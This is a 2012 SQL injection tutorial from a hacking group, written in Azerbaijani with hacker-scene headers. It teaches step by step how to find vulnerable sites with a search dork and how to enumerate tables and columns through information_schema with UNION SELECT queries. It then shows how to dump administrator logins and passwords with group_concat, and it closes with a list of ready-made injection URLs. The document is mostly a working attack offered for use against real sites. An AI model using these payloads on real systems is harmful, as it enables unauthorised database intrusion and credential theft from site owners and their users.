++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Date : 2012:04:25
# Subject : SQL Injection manual Another Way [ Volume 3]
# Author : Avatar [Fearless]
# Software : Anti-Armenia.ORG // Pirates-Crew.Org // Pwn.Me :D
# Team'Z : AA Team // PC Team // Pwn Team :D // The Fear // UG Team
# Greet'Z To : All Member'Z of the Team'Z
# Respect To : All My Bro'Z
# To need : NotePad,Browser,Computer :D
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Start :
Salamlar...Yuxarida Levazimatlari Yazmisham :D.. Belede 1 shey lazim deyil Exploit,Program kimi sadece Mozilla/Opera/Chrome/Explorer yani qisaca 1
Browser Lazim olacaq ve NotePad :D oda size mende var :D Her neyse... Uzatmadan bashlayaq... Buda Yeni 1 yoldur daha dogrusu Volume 2-nin updatesi desek
dogru olar... Bosh-Bekar qalirdim dedim Update edim... Ve Bingo! Hazir Let'Z Start :
# Targer Site : http://site.com/index.php?id=5
# Dork : index.php?id=
# Open : http://site.com/index.php?id='5
# Order : http://site.com/index.php?id=5 order by 10--
# Result : Error[Unknown Column]
# indi ise errorumuzuda aldiq :D ve sira geldi tableleri tapmaga
# bunun ucunde : http://site.com/index.php?id=-5 union all select 1,2,3,4,5,6,7,8,9,10--
# Result : 3,2,5
# Ve biz-de 3-u goturek en cox onu secirem Keep Moving
# http://site.com/index.php?id=-5 union all select 1,2,table_name,4,5,6,7,8,9,10 FROM information_schema.tables limit 2,1--
# Sozun duzu burda version@@ versionun bilmek ucundur amma bu volume-de cox-da lazim olmur isteyen baxa biler... Ve limit :D
# Table name : notificiation
# http://site.com/index.php?id=-5 union all select 1,2,table_name,4,5,6,7,8,9,10 FROM information_schema.tables limit 1,1--
# Belelikle Taki, admin/userinfo/user vs. kimi tapana qeder
Ve tapdiq
# Table name : "admin"
indi ise bunu Hex Codlashdirma ile hex-leyek... Men bu sefer ferqli Hex Code yada Hex Encode Sayti gotururem...
# Hex Encode Site : http://mikezilla.com/exp0012.html
ve indi table adimiz admin onu hex-leyek
# Result : %61%64%6D%69%6E
indi bunu duzeldek
# Update & Result : 61646D696E
Belelikle esl Hex-lenmish kodumuz : # 61646D696E
indi devam edek Column adi tapaq
# http://site.com/index.php?id=-5 union all select 1,2,column_name,4,5,6,7,8,9,10 FROM information_schema.column where(table_name=0x61646D696E) limit 1,1--
Bele 1 shey... burda 0x yani hex-lenmish kodla ishleyirik... o zaman 99%-lik 1 netice cixir...
indi gordukki column adi geldi "ID" indi bize lazim olan login + pass dir onun ucunde
# http://site.com/index.php?id=-5 union all select 1,2,column_name,4,5,6,7,8,9,10 FROM information_schema.column where(table_name=0x61646D696E) limit 2,1--
# http://site.com/index.php?id=-5 union all select 1,2,column_name,4,5,6,7,8,9,10 FROM information_schema.column where(table_name=0x61646D696E) limit 3,1--
ve netice  Column adlari gelir tutaqki onlarda login & password-durlar...
indi sira geldi last yani axirinci ashamaya ve bu ashamada Volume 2-deki exploit daha dogrusu usul-dan komek alaq group_concat()-dan indi ise
# http://site.com/index.php?id=-5 union all select 1,2,group_concat(login,0x3a,password),4,5,6,7,8,9,10 FROM admin--
burda "admin" table adimiz-dir columns-larin yerleshdiyi table... Belelikle qabagimiza coxlu sayt cixir... Bu Gun-de sizlere Volume 3 yani 2 usul-dan 1-i alinmasa bu usul-u
yoxlayin derim... Men Avatar Fearless... Ne Sualiniz Olsa Buyurun... Source + Target Site + Site sizlere Verilecek thank'Z for Watching... Saolun! Bye!

http://site.com/index.php?id=5
http://site.com/index.php?id='5
http://site.com/index.php?id=5 order by 1--
http://site.com/index.php?id=-5 union all select 1,2,3,4,5--
http://site.com/index.php?id=-5 union all select 1,2,table_name,4,5 FROM information_schema.tables limit 2,1--
http://site.com/index.php?id=-5 union all select 1,2,table_name,4,5 FROM information_schema.tables limit 10,1--
http://site.com/index.php?id=-5 union all select 1,2,table_name,4,5 FROM information_schema.tables limit 20,1--
http://site.com/index.php?id=-5 union all select 1,2,column_name,4,5 FROM information_schema.columns where(table_name=0xHex)limit 1,1--
http://site.com/index.php?id=-5 union all select 1,2,group_concat(admin,0x3a,password),4,5 FROM admin--

http://mikezilla.com/exp0012.html